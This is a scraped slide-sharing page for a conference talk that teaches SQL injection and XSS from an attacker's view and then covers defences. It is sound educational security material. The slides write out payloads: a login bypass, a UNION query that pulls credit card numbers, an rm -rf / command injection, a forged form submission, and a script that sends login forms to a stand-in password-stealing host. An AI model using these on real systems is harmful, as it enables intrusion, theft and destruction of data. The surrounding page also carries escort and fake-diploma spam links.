Owasp Indy Q2 2012 Advanced SQLiOwasp Indy Q2 2012 Advanced SQLi
Owasp Indy Q2 2012 Advanced SQLi
 
A Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQLA Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQL
 
Locking Down Your MySQL Database.pptx
Locking Down Your MySQL Database.pptxLocking Down Your MySQL Database.pptx
Locking Down Your MySQL Database.pptx
 
How to lose your database and your job
How to lose your database and your jobHow to lose your database and your job
How to lose your database and your job
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 

Plus de Colin O'Dell

Demystifying Unicode - Longhorn PHP 2021
Demystifying Unicode - Longhorn PHP 2021Demystifying Unicode - Longhorn PHP 2021
Demystifying Unicode - Longhorn PHP 2021Colin O'Dell
 
Releasing High Quality Packages - Longhorn PHP 2021
Releasing High Quality Packages - Longhorn PHP 2021Releasing High Quality Packages - Longhorn PHP 2021
Releasing High Quality Packages - Longhorn PHP 2021Colin O'Dell
 
Releasing High Quality PHP Packages - ConFoo Montreal 2019
Releasing High Quality PHP Packages - ConFoo Montreal 2019Releasing High Quality PHP Packages - ConFoo Montreal 2019
Releasing High Quality PHP Packages - ConFoo Montreal 2019Colin O'Dell
 
Debugging Effectively - ConFoo Montreal 2019
Debugging Effectively - ConFoo Montreal 2019Debugging Effectively - ConFoo Montreal 2019
Debugging Effectively - ConFoo Montreal 2019Colin O'Dell
 
Automating Deployments with Deployer - php[world] 2018
Automating Deployments with Deployer - php[world] 2018Automating Deployments with Deployer - php[world] 2018
Automating Deployments with Deployer - php[world] 2018Colin O'Dell
 
Releasing High-Quality Packages - php[world] 2018
Releasing High-Quality Packages - php[world] 2018Releasing High-Quality Packages - php[world] 2018
Releasing High-Quality Packages - php[world] 2018Colin O'Dell
 
Debugging Effectively - DrupalCon Nashville 2018
Debugging Effectively - DrupalCon Nashville 2018Debugging Effectively - DrupalCon Nashville 2018
Debugging Effectively - DrupalCon Nashville 2018Colin O'Dell
 
CommonMark: Markdown Done Right - ZendCon 2017
CommonMark: Markdown Done Right - ZendCon 2017CommonMark: Markdown Done Right - ZendCon 2017
CommonMark: Markdown Done Right - ZendCon 2017Colin O'Dell
 
Rise of the Machines: PHP and IoT - ZendCon 2017
Rise of the Machines: PHP and IoT - ZendCon 2017Rise of the Machines: PHP and IoT - ZendCon 2017
Rise of the Machines: PHP and IoT - ZendCon 2017Colin O'Dell
 
Debugging Effectively - All Things Open 2017
Debugging Effectively - All Things Open 2017Debugging Effectively - All Things Open 2017
Debugging Effectively - All Things Open 2017Colin O'Dell
 
Debugging Effectively - PHP UK 2017
Debugging Effectively - PHP UK 2017Debugging Effectively - PHP UK 2017
Debugging Effectively - PHP UK 2017Colin O'Dell
 
Debugging Effectively - SunshinePHP 2017
Debugging Effectively - SunshinePHP 2017Debugging Effectively - SunshinePHP 2017
Debugging Effectively - SunshinePHP 2017Colin O'Dell
 
Automating Your Workflow with Gulp.js - php[world] 2016
Automating Your Workflow with Gulp.js - php[world] 2016Automating Your Workflow with Gulp.js - php[world] 2016
Automating Your Workflow with Gulp.js - php[world] 2016Colin O'Dell
 
Rise of the Machines: PHP and IoT - php[world] 2016
Rise of the Machines: PHP and IoT - php[world] 2016Rise of the Machines: PHP and IoT - php[world] 2016
Rise of the Machines: PHP and IoT - php[world] 2016Colin O'Dell
 
Debugging Effectively - ZendCon 2016
Debugging Effectively - ZendCon 2016Debugging Effectively - ZendCon 2016
Debugging Effectively - ZendCon 2016Colin O'Dell
 
Debugging Effectively - DrupalCon Europe 2016
Debugging Effectively - DrupalCon Europe 2016Debugging Effectively - DrupalCon Europe 2016
Debugging Effectively - DrupalCon Europe 2016Colin O'Dell
 
CommonMark: Markdown done right - Nomad PHP September 2016
CommonMark: Markdown done right - Nomad PHP September 2016CommonMark: Markdown done right - Nomad PHP September 2016
CommonMark: Markdown done right - Nomad PHP September 2016Colin O'Dell
 
Debugging Effectively - Frederick Web Tech 9/6/16
Debugging Effectively - Frederick Web Tech 9/6/16Debugging Effectively - Frederick Web Tech 9/6/16
Debugging Effectively - Frederick Web Tech 9/6/16Colin O'Dell
 
Debugging Effectively
Debugging EffectivelyDebugging Effectively
Debugging EffectivelyColin O'Dell
 
CommonMark: Markdown Done Right
CommonMark: Markdown Done RightCommonMark: Markdown Done Right
CommonMark: Markdown Done RightColin O'Dell
 

Plus de Colin O'Dell (20)

Demystifying Unicode - Longhorn PHP 2021
Demystifying Unicode - Longhorn PHP 2021Demystifying Unicode - Longhorn PHP 2021
Demystifying Unicode - Longhorn PHP 2021
 
Releasing High Quality Packages - Longhorn PHP 2021
Releasing High Quality Packages - Longhorn PHP 2021Releasing High Quality Packages - Longhorn PHP 2021
Releasing High Quality Packages - Longhorn PHP 2021
 
Releasing High Quality PHP Packages - ConFoo Montreal 2019
Releasing High Quality PHP Packages - ConFoo Montreal 2019Releasing High Quality PHP Packages - ConFoo Montreal 2019
Releasing High Quality PHP Packages - ConFoo Montreal 2019
 
Debugging Effectively - ConFoo Montreal 2019
Debugging Effectively - ConFoo Montreal 2019Debugging Effectively - ConFoo Montreal 2019
Debugging Effectively - ConFoo Montreal 2019
 
Automating Deployments with Deployer - php[world] 2018
Automating Deployments with Deployer - php[world] 2018Automating Deployments with Deployer - php[world] 2018
Automating Deployments with Deployer - php[world] 2018
 
Releasing High-Quality Packages - php[world] 2018
Releasing High-Quality Packages - php[world] 2018Releasing High-Quality Packages - php[world] 2018
Releasing High-Quality Packages - php[world] 2018
 
Debugging Effectively - DrupalCon Nashville 2018
Debugging Effectively - DrupalCon Nashville 2018Debugging Effectively - DrupalCon Nashville 2018
Debugging Effectively - DrupalCon Nashville 2018
 
CommonMark: Markdown Done Right - ZendCon 2017
CommonMark: Markdown Done Right - ZendCon 2017CommonMark: Markdown Done Right - ZendCon 2017
CommonMark: Markdown Done Right - ZendCon 2017
 
Rise of the Machines: PHP and IoT - ZendCon 2017
Rise of the Machines: PHP and IoT - ZendCon 2017Rise of the Machines: PHP and IoT - ZendCon 2017
Rise of the Machines: PHP and IoT - ZendCon 2017
 
Debugging Effectively - All Things Open 2017
Debugging Effectively - All Things Open 2017Debugging Effectively - All Things Open 2017
Debugging Effectively - All Things Open 2017
 
Debugging Effectively - PHP UK 2017
Debugging Effectively - PHP UK 2017Debugging Effectively - PHP UK 2017
Debugging Effectively - PHP UK 2017
 
Debugging Effectively - SunshinePHP 2017
Debugging Effectively - SunshinePHP 2017Debugging Effectively - SunshinePHP 2017
Debugging Effectively - SunshinePHP 2017
 
Automating Your Workflow with Gulp.js - php[world] 2016
Automating Your Workflow with Gulp.js - php[world] 2016Automating Your Workflow with Gulp.js - php[world] 2016
Automating Your Workflow with Gulp.js - php[world] 2016
 
Rise of the Machines: PHP and IoT - php[world] 2016
Rise of the Machines: PHP and IoT - php[world] 2016Rise of the Machines: PHP and IoT - php[world] 2016
Rise of the Machines: PHP and IoT - php[world] 2016
 
Debugging Effectively - ZendCon 2016
Debugging Effectively - ZendCon 2016Debugging Effectively - ZendCon 2016
Debugging Effectively - ZendCon 2016
 
Debugging Effectively - DrupalCon Europe 2016
Debugging Effectively - DrupalCon Europe 2016Debugging Effectively - DrupalCon Europe 2016
Debugging Effectively - DrupalCon Europe 2016
 
CommonMark: Markdown done right - Nomad PHP September 2016
CommonMark: Markdown done right - Nomad PHP September 2016CommonMark: Markdown done right - Nomad PHP September 2016
CommonMark: Markdown done right - Nomad PHP September 2016
 
Debugging Effectively - Frederick Web Tech 9/6/16
Debugging Effectively - Frederick Web Tech 9/6/16Debugging Effectively - Frederick Web Tech 9/6/16
Debugging Effectively - Frederick Web Tech 9/6/16
 
Debugging Effectively
Debugging EffectivelyDebugging Effectively
Debugging Effectively
 
CommonMark: Markdown Done Right
CommonMark: Markdown Done RightCommonMark: Markdown Done Right
CommonMark: Markdown Done Right
 

Dernier

一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样ayvbos
 
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsIndian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsMonica Sydney
 
一比一原版贝德福特大学毕业证学位证书
一比一原版贝德福特大学毕业证学位证书一比一原版贝德福特大学毕业证学位证书
一比一原版贝德福特大学毕业证学位证书F
 
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...kajalverma014
 
Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...
Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...
Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...kumargunjan9515
 
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查ydyuyu
 
Mira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
Mira Road Housewife Call Girls 07506202331, Nalasopara Call GirlsMira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
Mira Road Housewife Call Girls 07506202331, Nalasopara Call GirlsPriya Reddy
 
一比一原版犹他大学毕业证如何办理
一比一原版犹他大学毕业证如何办理一比一原版犹他大学毕业证如何办理
一比一原版犹他大学毕业证如何办理F
 
Abu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
Abu Dhabi Escorts Service 0508644382 Escorts in Abu DhabiAbu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
Abu Dhabi Escorts Service 0508644382 Escorts in Abu DhabiMonica Sydney
 
一比一原版田纳西大学毕业证如何办理
一比一原版田纳西大学毕业证如何办理一比一原版田纳西大学毕业证如何办理
一比一原版田纳西大学毕业证如何办理F
 
一比一原版(Dundee毕业证书)英国爱丁堡龙比亚大学毕业证如何办理
一比一原版(Dundee毕业证书)英国爱丁堡龙比亚大学毕业证如何办理一比一原版(Dundee毕业证书)英国爱丁堡龙比亚大学毕业证如何办理
一比一原版(Dundee毕业证书)英国爱丁堡龙比亚大学毕业证如何办理AS
 
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制pxcywzqs
 
PIC Microcontroller Structure & Assembly Language.ppsx
PIC Microcontroller Structure & Assembly Language.ppsxPIC Microcontroller Structure & Assembly Language.ppsx
PIC Microcontroller Structure & Assembly Language.ppsxjeykeydeveloper
 
一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理F
 
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime NagercoilNagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoilmeghakumariji156
 
Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.krishnachandrapal52
 
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查ydyuyu
 
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...gajnagarg
 
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge GraphsEleniIlkou
 
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrStory Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrHenryBriggs2
 

Dernier (20)

一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
 
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsIndian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
 
一比一原版贝德福特大学毕业证学位证书
一比一原版贝德福特大学毕业证学位证书一比一原版贝德福特大学毕业证学位证书
一比一原版贝德福特大学毕业证学位证书
 
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
 
Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...
Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...
Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...
 
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
 
Mira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
Mira Road Housewife Call Girls 07506202331, Nalasopara Call GirlsMira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
Mira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
 
一比一原版犹他大学毕业证如何办理
一比一原版犹他大学毕业证如何办理一比一原版犹他大学毕业证如何办理
一比一原版犹他大学毕业证如何办理
 
Abu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
Abu Dhabi Escorts Service 0508644382 Escorts in Abu DhabiAbu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
Abu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
 
一比一原版田纳西大学毕业证如何办理
一比一原版田纳西大学毕业证如何办理一比一原版田纳西大学毕业证如何办理
一比一原版田纳西大学毕业证如何办理
 
一比一原版(Dundee毕业证书)英国爱丁堡龙比亚大学毕业证如何办理
一比一原版(Dundee毕业证书)英国爱丁堡龙比亚大学毕业证如何办理一比一原版(Dundee毕业证书)英国爱丁堡龙比亚大学毕业证如何办理
一比一原版(Dundee毕业证书)英国爱丁堡龙比亚大学毕业证如何办理
 
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
一比一原版(Offer)康考迪亚大学毕业证学位证靠谱定制
 
PIC Microcontroller Structure & Assembly Language.ppsx
PIC Microcontroller Structure & Assembly Language.ppsxPIC Microcontroller Structure & Assembly Language.ppsx
PIC Microcontroller Structure & Assembly Language.ppsx
 
一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理
 
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime NagercoilNagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
 
Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.
 
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
 
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
 
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
 
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrStory Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
 

Hacking Your Way To Better Security

  • 1. Hacking Your Way To Better Security
  • 2. Colin O’Dell @colinodell Lead Web Developer at Unleashed Technologies PHP developer since 2002 league/commonmark maintainer PHP 7 Upgrade Guide e-book author php[world] 2015 CtF winner
  • 3. Goals Explore several top security vulnerabilities from the perspective of an attacker. 1. Understand how to detect and exploit common vulnerabilities 2. Learn how to protect against those vulnerabilities
  • 4. Disclaimers 1.NEVER test systems that aren’t yours without explicit permission. 2.Examples in this talk are fictional, but the vulnerability behaviors shown are very real.
  • 6. OWASP Top 10 Regular publication by The Open Web Application Security Project Highlights the 10 most-critical web application security risks
  • 7.
  • 8.
  • 9. SQL Injection Modifying SQL statements to: Spoof identity Tamper with data Disclose hidden information
  • 10. SQL Injection Basics $value = $_REQUEST['value']; SELECT * FROM x WHERE y = '[MALICIOUS CODE HERE]' "; $sql = "SELECT * FROM x WHERE y = '$value' "; $database->query($sql);
  • 12. Username Password Log In admin Invalid username or password. Please try again. password'
  • 14. tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "password'" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = 'password''; $ $
  • 15. tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "password'" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = 'password''; $ ~~ $
  • 18. tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "' test" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = '' test'; $ $
  • 19. tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "' test" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = '' test'; $ $ ~~~~~~~~
  • 20. ~~~~~~~~ SELECT * FROM users WHERE username = 'admin' AND password = '' test'; SELECT * FROM users WHERE username = 'admin' AND password = ''; SELECT * FROM users WHERE username = 'admin' AND password = '' OR (something that is true); SELECT * FROM users WHERE username = 'admin' AND (true); SELECT * FROM users WHERE username = 'admin';
  • 21. SELECT * FROM users WHERE username = 'admin' AND password = '' test '; ' test
  • 22. SELECT * FROM users WHERE username = 'admin' AND password = '' test '; ' test SELECT * FROM users WHERE username = 'admin' AND password = '' test '; ~~~~~~~~~~~~~~~
  • 23. SELECT * FROM users WHERE username = 'admin' AND password = ' '; SELECT * FROM users WHERE username = 'admin' AND password = ' ';
  • 24. SELECT * FROM users WHERE username = 'admin' AND password = '' '; ' SELECT * FROM users WHERE username = 'admin' AND password = '' '; ~~~
  • 25. SELECT * FROM users WHERE username = 'admin' AND password = '' ' '; ' ' SELECT * FROM users WHERE username = 'admin' AND password = '' ' '; ~~~~~~~~~~~~~~
  • 26. SELECT * FROM users WHERE username = 'admin' AND password = '' OR ' '; ' OR ' SELECT * FROM users WHERE username = 'admin' AND password = '' OR ' ';
  • 27. SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1'; ' OR '1'='1 SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1';
  • 29. Welcome Admin! Admin Menu: Give customer money Take money away Review credit card applications Close accounts
  • 31. Blind SQL Injection Invalid username or password. Please try again. Unknown error. Valid query (empty result) Invalid query Welcome Admin! Valid query (with result)
  • 32. Username Password Log In admin ' AND (SELECT id FROM user LIMIT 1) = '
  • 33. Username Password Log In admin ' AND (SELECT id FROM user LIMIT 1) = ' Unknown error. ErrorsQuery SELECT * FROM users WHERE username = 'admin' AND password = '' AND (SELECT id FROM user LIMIT 1) = '';
  • 34. Username Password Log In admin ' AND (SELECT id FROM user LIMIT 1) = ' ErrorsQuery MySQL error: Unknown table 'user'. Unknown error.
  • 35. Username Password Log In admin ' AND (SELECT id FROM users LIMIT 1) = ' ErrorsQuery MySQL error: Unknown table 'user'. Unknown error.
  • 36. Username Password Log In admin Invalid username or password. Please try again.
  • 38. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/123 SELECT * FROM books WHERE id = 123 $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => 'The Great Gatsby', 'author' => 'F. Scott Fitzgerald', 'price' => 9.75 }
  • 39. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 SELECT * FROM books WHERE id = 99999 $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { }
  • 40. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/????? SELECT * FROM books WHERE id = ????? $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
  • 41. SQL UNION Query Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Column 1 Column 2 Column 3 Foo Bar 123 Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Foo Bar 123 UNION
  • 42. SQL UNION Query Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Column 1 Column 2 Column 3 (SELECT) 1 1 Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 (SELECT) 1 1 UNION
  • 43. SQL UNION Query Column 1 Column 2 Column 3 (empty) Column 1 Column 2 Column 3 (SELECT) 1 1 Column 1 Column 2 Column 3 (SELECT) 1 1 UNION
  • 44. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number FROM creditcards SELECT * FROM books WHERE id = ????? $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
  • 45. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = ????? $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
  • 46. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = 99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
  • 47. SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = 99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards $id = …; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '4012-3456-7890-1234', 'author' => 1, 'price' => 1 }
  • 48. $val = $_REQUEST['value']; $sql = "SELECT * FROM x WHERE y = '$val' "; $database->query($sql); Protecting Against SQL Injection Block input with special characters
  • 49. Protecting Against SQL Injection Block input with special characters Escape user input $value = $_REQUEST['value']; $escaped = mysqli_real_escape_string($value); $sql = "SELECT * FROM x WHERE y = '$escaped' "; $database->query($sql); ' OR '1' = '1 ' OR '1' = '1 mysqli_real_escape_string() SELECT * FROM x WHERE y = '' OR '1' = '1'
  • 50. Protecting Against SQL Injection Block input with special characters Escape user input $value = $_REQUEST['value']; $escaped = mysqli_real_escape_string($value); $sql = "SELECT * FROM x WHERE y = '$escaped' "; $database->query($sql); ' OR '1' = '1 ' OR '1' = '1 mysqli_real_escape_string() SELECT * FROM x WHERE y = '' OR '1' = '1'
  • 51. Protecting Against SQL Injection Block input with special characters Escape user input Use prepared statements $mysqli = new mysqli("localhost", "user", "pass", "db"); $q = $mysqli->prepare("SELECT * FROM x WHERE y = '?' "); $q->bind_param(1, $_REQUEST['value']); $q->execute(); Native PHP: ● mysqli ● pdo_mysql Frameworks / Libraries: ● Doctrine ● Eloquent ● Zend_Db
  • 52. Other Types of Injection NoSQL databases OS Commands LDAP Queries SMTP Headers $file = $_GET['filename']; shell_exec("rm uploads/{$file}"); /rm.php?filename=foo.jpg+%26%26+rm+-rf+%2F rm uploads/foo.jpg && rm -rf /
  • 53. XSS Cross-Site Scripting Injecting code into the webpage (for other users) • Execute malicious scripts • Hijack sessions • Install malware • Deface websites
  • 54. XSS Attack Basics $value = $_POST['value']; $value = $rssFeed->first->title; $value = db_fetch('SELECT x FROM table'); <?php echo $value ?> Raw code/script is injected onto a page
  • 55. XSS – Cross-Site Scripting Basics Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script>
  • 56. XSS – Cross-Site Scripting short.ly Paste a URL here Shorten
  • 57. XSS – Cross-Site Scripting short.ly http://www.colinodell.com Shorten
  • 58. XSS – Cross-Site Scripting short.ly http://www.colinodell.com Shorten Short URL: http://short.ly/b7fe9 Original URL:http://www.colinodell.com
  • 59. XSS – Cross-Site Scripting short.ly Please wait while we redirect you to http://www.colinodell.com
  • 60. XSS – Cross-Site Scripting short.ly <script>alert('hello world!');</script> Shorten
  • 61. XSS – Cross-Site Scripting short.ly <script>alert('hello world!');</script> Shorten Short URL: http://short.ly/3bs8a Original URL: hello world! OK X
  • 62. XSS – Cross-Site Scripting short.ly <script>alert('hello world!');</script> Shorten Short URL: http://short.ly/3bs8a Original URL:
  • 63. <p> Short URL: <a href="…">http://short.ly/3bs8a</a> </p> <p> Original URL: <a href="…"><script>alert('hello world!');</script></a> </p>
  • 64. XSS – Cross-Site Scripting short.ly <iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"> Shorten
  • 65. XSS – Cross-Site Scripting short.ly <iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"> Shorten Short URL: http://short.ly/3bs8a Original URL:
  • 66. XSS – Cross-Site Scripting short.ly Please wait while we redirect you to
  • 67. XSS – Cross-Site Scripting document.getElementById('login-form').action = 'http://malicious-site.com/steal-passwords.php';
  • 68. Protecting Against XSS Attacks $value = $_POST['value']; $value = db_fetch('SELECT value FROM table'); $value = $rssFeed->first->title; <?php echo $value ?>
  • 69. Protecting Against XSS Attacks • Filter user input $value = strip_tags($_POST['value']); $value = strip_tags( db_fetch('SELECT value FROM table') ); $value = strip_tags($rssFeed->first->title); <?php echo $value ?>
  • 70. Protecting Against XSS Attacks • Filter user input • Escape user input $value = htmlspecialchars($_POST['value']); $value = htmlspecialchars( db_fetch('SELECT value FROM table') ); $value = htmlspecialchars($rssFeed->first->title); <?php echo $value ?> <script> &lt;script&gt; htmlspecialchars()
  • 71. Protecting Against XSS Attacks • Filter user input • Escape user input • Escape output $value = $_POST['value']; $value = db_fetch('SELECT value FROM table'); $value = $rssFeed->first->title; <?php echo htmlspecialchars($value) ?>
  • 72. Protecting Against XSS Attacks • Filter user input • Escape user input • Escape output {{ some_variable }} {{ some_variable|raw }}
